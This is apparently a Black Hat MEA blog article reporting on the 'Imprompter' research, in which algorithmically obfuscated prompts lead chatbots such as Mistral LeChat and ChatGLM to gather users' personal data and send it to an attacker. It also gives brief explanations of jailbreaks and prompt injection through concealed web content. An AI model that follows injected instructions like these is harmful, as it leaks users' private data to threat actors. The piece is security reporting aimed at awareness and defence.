An AI prompt that extracts personal data from chatbots

by Black Hat Middle East and Africa

on Aug 06, 2025

An AI prompt that extracts personal data from chatbots

Chatbots are used across industries, particularly for customer service and consumer service purposes. For customers of a business, they’re a useful tool. They can answer routine questions and bring up stored data on request, minimising the amount of time you have to spend on the phone, on hold, waiting to talk to a human to complete a mundane task.

When users interact with a chatbot, there’s usually an exchange of personal information. You might share your name, date of birth, and your address; and maybe even personal preferences and interests that relate to the services you’re accessing. This creates risk: because when you share personal data with a chatbot, your data is vulnerable if the Large Language Model (LLM) behind that tool becomes vulnerable to attack.

Now, security researchers at the University of California, San Diego (UCSD) and Nanyang Technological University in Singapore have uncovered a new type of attack. An AI prompt triggers an LLM to collect your personal information from chats, and send it straight to a threat actor.

A new chatbot attack

In a paper published on October 17 2024, the researchers named the attack Imprompter, and explained how it uses an algorithm to turn a prompt supplied to the LLM into a set of malicious instructions that are hidden from the user.

Through their investigations, the researchers were able to “surface a new class of automatically computed obfuscated adversarial prompt attacks that violate the confidentiality and integrity of user resources connected to an LLM agent.”

And they demonstrated a number of use cases for the prompt algorithm on different chatbots, including Mistral LeChat (with an 80% success rate for the attack) and ChatGLM.

Through a range of these experiments, it became clear that these attacks “reliably work on emerging agent-based systems like Mistral’s LeChat, ChatGLM, and Meta’s Llama.”

Finding vulnerabilities in popular LLMs

Following the report on Imprompter, Mistral AI told Wired it had fixed the vulnerability that enables the algorithm to work. And ChatGLM issued a statement emphasising it takes security very seriously, without offering direct comments on this particular vulnerability.

Aside from this particular form of attack, vulnerabilities in popular LLMs have been a growing problem since the 2022 release of ChatGPT.

As reported by Wired, these vulnerabilities often come under two broad categories:

Jailbreaks. These trick an AI system into bypassing its own safety rules, using prompts that override the AI model’s settings.
Prompt injections. These work by feeding a set of instructions from external data into the AI to tell them to steal or manipulate data. For example, this might be a concealed prompt on a website that the AI absorbs if it takes information from that page.

Prompt injections are a growing concern because they’re very difficult to protect against. They turn the AI against itself, and researchers aren’t 100% sure they understand how it happens. It’s possible that LLMs are learning obscure connections that go beyond natural language – working in a language that human beings don’t understand.

And the outcome is that the AI follows a prompt injected by a threat actor and supplies sensitive data to a malicious website for the hacker to use as they wish.

The bottom line is that right now, any LLM that handles personal data should do so with great care, and be subject to extensive and creative security testing. And any person who inputs their data into an LLM should be aware of the risks – consider how much information you’re giving away, and what that data could be used for if it were stolen.

Join us at Black Hat MEA 2024 and discover how to improve your organisation’s cyber resilience.

REGISTER NOW

Share on

Join newsletter

Join the newsletter to receive the latest updates in your inbox.

Topics

Webinars Cryptography Network Defense Articles Ransomware Podcasts CyberSecurity Applied Security Whitepaper Exploit Development Reverse Engineering Newsletters

Sign up for more like this.

Join the newsletter to receive the latest updates in your inbox.

An AI prompt that extracts personal data from chatbots

A new chatbot attack

Finding vulnerabilities in popular LLMs

Join newsletter

Follow us

Topics

Sign up for more like this.

Related articles

Attack on the devs: Why data exfiltration is a top threat to 2025 supply chains

Why railways are an engineering marvel but a cybersecurity nightmare

Break, build, repeat: How hackers learn differently